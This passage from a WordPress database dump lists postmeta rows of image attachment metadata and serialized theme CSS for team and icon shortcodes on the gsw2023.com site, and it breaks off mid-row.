(19984,3103,'_wp_attached_file','2022/11/Screenshot_1.jpg'),
(19985,3103,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:120;s:6:\"height\";i:115;s:4:\"file\";s:24:\"2022/11/Screenshot_1.jpg\";s:8:\"filesize\";i:3034;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19986,3109,'_wpb_shortcodes_custom_css','.vc_custom_1667948786016{margin-top: 20px !important;}'),
(19987,3066,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(19988,3110,'_wpb_shortcodes_custom_css','.vc_custom_1667948825977{margin-top: 25px !important;}'),
(19989,3111,'_wpb_shortcodes_custom_css','.vc_custom_1667948825977{margin-top: 25px !important;}'),
(19990,3112,'_wpb_shortcodes_custom_css','.vc_custom_1667948825977{margin-top: 25px !important;}'),
(19991,3113,'_wpb_shortcodes_custom_css','.vc_custom_1667948825977{margin-top: 25px !important;}'),
(19992,3114,'_wpb_shortcodes_custom_css','.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1667949123077{background-image: url(https://gsw2023.com/wp-content/uploads/2022/10/11.jpg?id=2732) !important;}'),
(19995,3116,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1667949123077{background-image: url(https://gsw2023.com/wp-content/uploads/2022/10/11.jpg?id=2732) !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(19996,3066,'the7_shortcodes_dynamic_css','a:9:{s:32:\"e62370e6382313f7e7694497777c8cbf\";s:185:\"#default-btn-e62370e6382313f7e7694497777c8cbf.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-e62370e6382313f7e7694497777c8cbf > i {\n  margin-right: 8px;\n}\n\";s:32:\"bfc9be123cb06fa22000677cd14f2763\";s:185:\"#default-btn-bfc9be123cb06fa22000677cd14f2763.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-bfc9be123cb06fa22000677cd14f2763 > i {\n  margin-right: 8px;\n}\n\";s:32:\"5ca8aef9ec4a450e4a3cdd9530a35633\";s:7020:\".dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.content-bg-on .team-container {\n  background: #e8e8e8;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .team-author p {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633  .team-media {\n  padding: 10px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633  .team-media img {\n  max-width: 120px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .dt-css-grid .team-media img {\n  width: 120px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-5ca8aef9ec4a450e4a3cdd9530a35633.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"01433c746f7d86079ca87ef81cfd7cc9\";s:185:\"#default-btn-01433c746f7d86079ca87ef81cfd7cc9.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-01433c746f7d86079ca87ef81cfd7cc9 > i {\n  margin-right: 8px;\n}\n\";s:32:\"1aad563ada2855245e1fe49cfd68fbd0\";s:185:\"#default-btn-1aad563ada2855245e1fe49cfd68fbd0.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-1aad563ada2855245e1fe49cfd68fbd0 > i {\n  margin-right: 8px;\n}\n\";s:32:\"4cd438c147990b410e06444af18314ea\";s:185:\"#default-btn-4cd438c147990b410e06444af18314ea.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-4cd438c147990b410e06444af18314ea > i {\n  margin-right: 8px;\n}\n\";s:32:\"6bbdc8c55155254ca0e29c3199371bca\";s:6828:\".dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca  .team-media {\n  padding: 10px 10px 10px 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca  .team-media img {\n  max-width: 200px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .dt-css-grid .team-media img {\n  width: 200px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(4,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 25%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-6bbdc8c55155254ca0e29c3199371bca.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"ddb2e51bb9ae7f50c064466257074c51\";s:185:\"#default-btn-ddb2e51bb9ae7f50c064466257074c51.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-ddb2e51bb9ae7f50c064466257074c51 > i {\n  margin-right: 8px;\n}\n\";s:32:\"f0dc5fe952c3439ad73b6382808806b7\";s:5761:\".icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon {\n  width: 60px;\n  height: 60px;\n  line-height: 60px;\n  font-size: 32px;\n  border-radius: 200px;\n  margin: 0px 0px 0px 0px;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon .icon-inner {\n  min-width: 60px;\n  min-height: 60px;\n  border-radius: 200px;\n}\n@media all and (-ms-high-contrast: none) {\n  .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon .icon-inner {\n    height: 60px;\n  }\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon .dt-hover-icon {\n  line-height: 60px;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon:before,\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon:after,\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon .icon-inner:before,\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon .icon-inner:after {\n  min-width: 100%;\n  min-height: 100%;\n  padding: inherit;\n  border-radius: inherit;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-border-on:before {\n  border-width: 2px;\n  border-style: solid;\n}\n.dt-icon-border-dashed.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-border-on:before {\n  border-style: dashed;\n}\n.dt-icon-border-dotted.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-border-on:before {\n  border-style: dotted;\n}\n.dt-icon-border-double.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-border-on:before {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-border-dashed.dt-icon-border-on:before {\n  border-style: dashed;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-border-dotted.dt-icon-border-on:before {\n  border-style: dotted;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-border-double.dt-icon-border-on:before {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-border-on:after {\n  border-width: 2px;\n  border-style: solid;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-border-dashed.dt-icon-hover-border-on:after {\n  border-style: dashed;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-border-dotted.dt-icon-hover-border-on:after {\n  border-style: dotted;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-border-double.dt-icon-hover-border-on:after {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-on:hover {\n  font-size: 32px;\n}\n#page .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-on:hover .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-on:hover .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-on:hover .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-on:hover .soc-icon {\n  color: #fff;\n  background: none;\n}\n#page .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-on:not(:hover) .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-on:not(:hover) .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-on:not(:hover) .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-on:not(:hover) .soc-icon,\n#page .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-off .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-off .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-off .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .text-icon.dt-icon-hover-off 